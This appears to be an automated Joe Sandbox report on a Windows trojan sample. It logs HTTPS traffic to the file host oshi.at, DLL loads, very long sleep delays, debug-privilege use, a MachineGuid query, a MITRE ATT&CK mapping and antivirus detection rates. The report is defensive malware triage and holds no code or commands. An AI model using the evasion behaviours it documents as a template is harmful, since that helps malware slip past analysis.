      Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49969 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
      Source: unknownNetwork traffic detected: HTTP traffic on port 50020 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50001
      Source: unknownNetwork traffic detected: HTTP traffic on port 50054 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50000
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50003
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50005
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
      Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50051 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50048 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50023 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50018
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50017
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49940
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50019
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
      Source: unknownNetwork traffic detected: HTTP traffic on port 50017 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50032 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50010
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50012
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50011
      Source: unknownNetwork traffic detected: HTTP traffic on port 50055 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50014
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50013
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50016
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50015
      Source: unknownNetwork traffic detected: HTTP traffic on port 50049 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50026 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50052 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50029
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50028
      Source: unknownNetwork traffic detected: HTTP traffic on port 50035 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50008 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50021
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50020
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50023
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50022
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50025
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50024
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50027
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50026
      Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50046 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50021 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50030
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49929
      Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50029 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
      Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50039
      Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50038 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
      Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50032
      Source: unknownNetwork traffic detected: HTTP traffic on port 50019 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50031
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50034
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50033
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50036
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50035
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50038
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50037
      Source: unknownNetwork traffic detected: HTTP traffic on port 50050 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50047 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49940 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49956 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50005 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50041
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49918
      Source: unknownNetwork traffic detected: HTTP traffic on port 50024 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50040
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49999
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
      Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
      Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50041 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
      Source: unknownNetwork traffic detected: HTTP traffic on port 50033 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50043
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50042
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50045
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50044
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50047
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50046
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50049
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50048
      Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50050
      Source: unknownNetwork traffic detected: HTTP traffic on port 50027 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50030 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50052
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50051
      Source: unknownNetwork traffic detected: HTTP traffic on port 50044 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
      Source: unknownHTTPS traffic detected: 194.15.112.248:443 -> 192.168.2.9:49743 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 194.15.112.248:443 -> 192.168.2.9:50019 version: TLS 1.2
      Source: MWP0FO5rAF.exeStatic PE information: invalid certificate
      Source: MWP0FO5rAF.exe, 00000000.00000002.3221776711.0000000000A5E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs MWP0FO5rAF.exe
      Source: MWP0FO5rAF.exe, 00000000.00000000.1373179471.0000000000372000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameref.exe8 vs MWP0FO5rAF.exe
      Source: MWP0FO5rAF.exeBinary or memory string: OriginalFilenameref.exe8 vs MWP0FO5rAF.exe
      Source: MWP0FO5rAF.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: classification engineClassification label: mal68.troj.winEXE@1/0@1/1
      Source: C:\Users\user\Desktop\MWP0FO5rAF.exeMutant created: NULL
      Source: MWP0FO5rAF.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: MWP0FO5rAF.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
      Source: C:\Users\user\Desktop\MWP0FO5rAF.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: MWP0FO5rAF.exeVirustotal: Detection: 73%
      Source: MWP0FO5rAF.exeReversingLabs: Detection: 65%
      Source: C:\Users\user\Desktop\MWP0FO5rAF.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Users\user\Desktop\MWP0FO5rAF.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\MWP0FO5rAF.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\MWP0FO5rAF.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\MWP0FO5rAF.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Users\user\Desktop\MWP0FO5rAF.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Users\user\Desktop\MWP0FO5rAF.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\MWP0FO5rAF.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\MWP0FO5rAF.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\MWP0FO5rAF.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\user\Desktop\MWP0FO5rAF.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Users\user\Desktop\MWP0FO5rAF.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\MWP0FO5rAF.exeSection loaded: rasapi32.dllJump to behavior
      Source: C:\Users\user\Desktop\MWP0FO5rAF.exeSection loaded: rasman.dllJump to behavior
      Source: C:\Users\user\Desktop\MWP0FO5rAF.exeSection loaded: rtutils.dllJump to behavior
      Source: C:\Users\user\Desktop\MWP0FO5rAF.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\Desktop\MWP0FO5rAF.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\Desktop\MWP0FO5rAF.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\MWP0FO5rAF.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\MWP0FO5rAF.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Users\user\Desktop\MWP0FO5rAF.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Users\user\Desktop\MWP0FO5rAF.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\Desktop\MWP0FO5rAF.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\Desktop\MWP0FO5rAF.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\Desktop\MWP0FO5rAF.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Users\user\Desktop\MWP0FO5rAF.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Users\user\Desktop\MWP0FO5rAF.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\Desktop\MWP0FO5rAF.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Users\user\Desktop\MWP0FO5rAF.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Users\user\Desktop\MWP0FO5rAF.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\MWP0FO5rAF.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Users\user\Desktop\MWP0FO5rAF.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Users\user\Desktop\MWP0FO5rAF.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\MWP0FO5rAF.exeSection loaded: gpapi.dllJump to behavior
      Source: MWP0FO5rAF.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
      Source: MWP0FO5rAF.exeStatic file information: File size 1072096 > 1048576
      Source: MWP0FO5rAF.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: C:\Users\user\Desktop\MWP0FO5rAF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\MWP0FO5rAF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\MWP0FO5rAF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\MWP0FO5rAF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\MWP0FO5rAF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\MWP0FO5rAF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\MWP0FO5rAF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\MWP0FO5rAF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\MWP0FO5rAF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\MWP0FO5rAF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\MWP0FO5rAF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\MWP0FO5rAF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\MWP0FO5rAF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\MWP0FO5rAF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\MWP0FO5rAF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\MWP0FO5rAF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\MWP0FO5rAF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\MWP0FO5rAF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\MWP0FO5rAF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\MWP0FO5rAF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\MWP0FO5rAF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\MWP0FO5rAF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\MWP0FO5rAF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\MWP0FO5rAF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\MWP0FO5rAF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\MWP0FO5rAF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\MWP0FO5rAF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\MWP0FO5rAF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\MWP0FO5rAF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\MWP0FO5rAF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\MWP0FO5rAF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\MWP0FO5rAF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\MWP0FO5rAF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\MWP0FO5rAF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\MWP0FO5rAF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\MWP0FO5rAF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\MWP0FO5rAF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\MWP0FO5rAF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\MWP0FO5rAF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\MWP0FO5rAF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\MWP0FO5rAF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\MWP0FO5rAF.exeMemory allocated: BD0000 memory reserve | memory write watchJump to behavior
      Source: C:\Users\user\Desktop\MWP0FO5rAF.exeMemory allocated: 2860000 memory reserve | memory write watchJump to behavior
      Source: C:\Users\user\Desktop\MWP0FO5rAF.exeMemory allocated: E10000 memory reserve | memory write watchJump to behavior
      Source: C:\Users\user\Desktop\MWP0FO5rAF.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Users\user\Desktop\MWP0FO5rAF.exeThread delayed: delay time: 600000Jump to behavior
      Source: C:\Users\user\Desktop\MWP0FO5rAF.exe TID: 7716Thread sleep time: -922337203685477s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\MWP0FO5rAF.exe TID: 7716Thread sleep time: -600000s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\MWP0FO5rAF.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Users\user\Desktop\MWP0FO5rAF.exeThread delayed: delay time: 600000Jump to behavior
      Source: MWP0FO5rAF.exe, 00000000.00000002.3221776711.0000000000A92000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
      Source: C:\Users\user\Desktop\MWP0FO5rAF.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Users\user\Desktop\MWP0FO5rAF.exeMemory allocated: page read and write | page guardJump to behavior
      Source: C:\Users\user\Desktop\MWP0FO5rAF.exeQueries volume information: C:\Users\user\Desktop\MWP0FO5rAF.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\MWP0FO5rAF.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
      DLL Side-Loading      		1
      DLL Side-Loading      		1
      Disable or Modify Tools      		OS Credential Dumping1
      Security Software Discovery      		Remote ServicesData from Local System1
      Encrypted Channel      		Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts31
      Virtualization/Sandbox Evasion      		LSASS Memory31
      Virtualization/Sandbox Evasion      		Remote Desktop ProtocolData from Removable Media3
      Non-Application Layer Protocol      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
      DLL Side-Loading      		Security Account Manager12
      System Information Discovery      		SMB/Windows Admin SharesData from Network Shared Drive4
      Application Layer Protocol      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
      Ingress Tool Transfer      		Traffic DuplicationData Destruction

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      MWP0FO5rAF.exe74%VirustotalBrowse
      MWP0FO5rAF.exe66%ReversingLabsWin32.Exploit.Generic
      MWP0FO5rAF.exe100%AviraHEUR/AGEN.1329692
      MWP0FO5rAF.exe100%Joe Sandbox ML

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      https://oshi.at/gQkq0%Avira URL Cloudsafe
      https://oshi.at/gQkqd0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      oshi.at
      		194.15.112.248
      		truefalse
        		high

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        https://oshi.at/gQkqfalse
        • Avira URL Cloud: safe
        		unknown

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        http://crls.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.crl0MWP0FO5rAF.exefalse
          		high
          http://oshi.atdMWP0FO5rAF.exe, 00000000.00000002.3222304799.00000000028DA000.00000004.00000800.00020000.00000000.sdmp, MWP0FO5rAF.exe, 00000000.00000002.3222304799.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpfalse
            		high
            http://crls.ssl.com/ssl.com-rsa-RootCA.crl0MWP0FO5rAF.exefalse
              		high
              https://oshi.at/gQkqdMWP0FO5rAF.exe, 00000000.00000002.3222304799.000000000295A000.00000004.00000800.00020000.00000000.sdmp, MWP0FO5rAF.exe, 00000000.00000002.3222304799.00000000028FB000.00000004.00000800.00020000.00000000.sdmp, MWP0FO5rAF.exe, 00000000.00000002.3222304799.0000000002A2C000.00000004.00000800.00020000.00000000.sdmp, MWP0FO5rAF.exe, 00000000.00000002.3222304799.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://crls.ssl.com/SSL.com-timeStamping-I-RSA-R1.crl0MWP0FO5rAF.exefalse
                		high
                http://oshi.atMWP0FO5rAF.exe, 00000000.00000002.3222304799.00000000028DA000.00000004.00000800.00020000.00000000.sdmp, MWP0FO5rAF.exe, 00000000.00000002.3222304799.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  https://github.com/somenonymous/OshiUploadMWP0FO5rAF.exe, 00000000.00000002.3222304799.00000000029E3000.00000004.00000800.00020000.00000000.sdmp, MWP0FO5rAF.exe, 00000000.00000002.3222304799.00000000028F7000.00000004.00000800.00020000.00000000.sdmp, MWP0FO5rAF.exe, 00000000.00000002.3222304799.0000000002B4D000.00000004.00000800.00020000.00000000.sdmp, MWP0FO5rAF.exe, 00000000.00000002.3222304799.0000000002B99000.00000004.00000800.00020000.00000000.sdmp, MWP0FO5rAF.exe, 00000000.00000002.3222304799.0000000002952000.00000004.00000800.00020000.00000000.sdmp, MWP0FO5rAF.exe, 00000000.00000002.3222304799.00000000029CB000.00000004.00000800.00020000.00000000.sdmp, MWP0FO5rAF.exe, 00000000.00000002.3222304799.0000000002956000.00000004.00000800.00020000.00000000.sdmp, MWP0FO5rAF.exe, 00000000.00000002.3222304799.00000000029E7000.00000004.00000800.00020000.00000000.sdmp, MWP0FO5rAF.exe, 00000000.00000002.3222304799.000000000295A000.00000004.00000800.00020000.00000000.sdmp, MWP0FO5rAF.exe, 00000000.00000002.3222304799.00000000029FF000.00000004.00000800.00020000.00000000.sdmp, MWP0FO5rAF.exe, 00000000.00000002.3222304799.0000000002B41000.00000004.00000800.00020000.00000000.sdmp, MWP0FO5rAF.exe, 00000000.00000002.3222304799.0000000002BDD000.00000004.00000800.00020000.00000000.sdmp, MWP0FO5rAF.exe, 00000000.00000002.3222304799.0000000002A0F000.00000004.00000800.00020000.00000000.sdmp, MWP0FO5rAF.exe, 00000000.00000002.3222304799.0000000002B69000.00000004.00000800.00020000.00000000.sdmp, MWP0FO5rAF.exe, 00000000.00000002.3222304799.0000000002B5D000.00000004.00000800.00020000.00000000.sdmp, MWP0FO5rAF.exe, 00000000.00000002.3222304799.0000000002B81000.00000004.00000800.00020000.00000000.sdmp, MWP0FO5rAF.exe, 00000000.00000002.3222304799.0000000002BD9000.00000004.00000800.00020000.00000000.sdmp, MWP0FO5rAF.exe, 00000000.00000002.3222304799.0000000002946000.00000004.00000800.00020000.00000000.sdmp, MWP0FO5rAF.exe, 00000000.00000002.3222304799.0000000002BC5000.00000004.00000800.00020000.00000000.sdmp, MWP0FO5rAF.exe, 00000000.00000002.3222304799.0000000002B65000.00000004.00000800.00020000.00000000.sdmp, MWP0FO5rAF.exe, 00000000.00000002.3222304799.000000000293E000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    https://www.ssl.com/repository0MWP0FO5rAF.exefalse
                      		high
                      http://ocsps.ssl.com0?MWP0FO5rAF.exefalse
                        		high
                        http://ocsps.ssl.com0_MWP0FO5rAF.exefalse
                          		high
                          http://www.ssl.com/repository/SSLcomRootCertificationAuthorityRSA.crt0MWP0FO5rAF.exefalse
                            		high
                            https://oshi.atMWP0FO5rAF.exe, 00000000.00000002.3222304799.000000000295A000.00000004.00000800.00020000.00000000.sdmp, MWP0FO5rAF.exe, 00000000.00000002.3222304799.00000000028C7000.00000004.00000800.00020000.00000000.sdmp, MWP0FO5rAF.exe, 00000000.00000002.3222304799.00000000028FB000.00000004.00000800.00020000.00000000.sdmp, MWP0FO5rAF.exe, 00000000.00000002.3222304799.0000000002A2C000.00000004.00000800.00020000.00000000.sdmp, MWP0FO5rAF.exe, 00000000.00000002.3222304799.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://cert.ssl.com/SSL.com-timeStamping-I-RSA-R1.cer0QMWP0FO5rAF.exefalse
                                		high
                                http://ocsps.ssl.com0MWP0FO5rAF.exefalse
                                  		high
                                  http://cert.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.cer0MWP0FO5rAF.exefalse
                                    		high
                                    http://crls.ssl.com/SSLcom-RootCA-EV-RSA-4096-R2.crl0MWP0FO5rAF.exefalse
                                      		high
                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameMWP0FO5rAF.exe, 00000000.00000002.3222304799.00000000028C7000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.ssl.com/repository/SSLcom-RootCA-EV-RSA-4096-R2.crt0MWP0FO5rAF.exefalse
                                          		high

                                          World Map of Contacted IPs

                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs

                                          Public IPs

                                          IPDomainCountryFlagASNASN NameMalicious
                                          194.15.112.248
                                          		oshi.atUkraine
                                          		213354INTERNATIONAL-HOSTING-SOLUTIONS-ASEUDCrouteGBfalse

                                          General Information

                                          Joe Sandbox version:42.0.0 Malachite
                                          Analysis ID:1587871
                                          Start date and time:2025-01-10 18:55:44 +01:00
                                          Joe Sandbox product:CloudBasic
                                          Overall analysis duration:0h 5m 12s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                          Run name:Run with higher sleep bypass
                                          Number of analysed new started processes analysed:6
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Sample name:MWP0FO5rAF.exe
                                          renamed because original name is a hash value
                                          Original Sample Name:f55861fdfab03622d2e522711b19b3edfa6d50906ab712cfae0810639205b0ce.exe
                                          Detection:MAL
                                          Classification:mal68.troj.winEXE@1/0@1/1
                                          EGA Information:Failed
                                          HCA Information:
                                          • Successful, ratio: 100%
                                          • Number of executed functions: 6
                                          • Number of non-executed functions: 0
                                          Cookbook Comments:
                                          • Found application associated with file extension: .exe
                                          • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
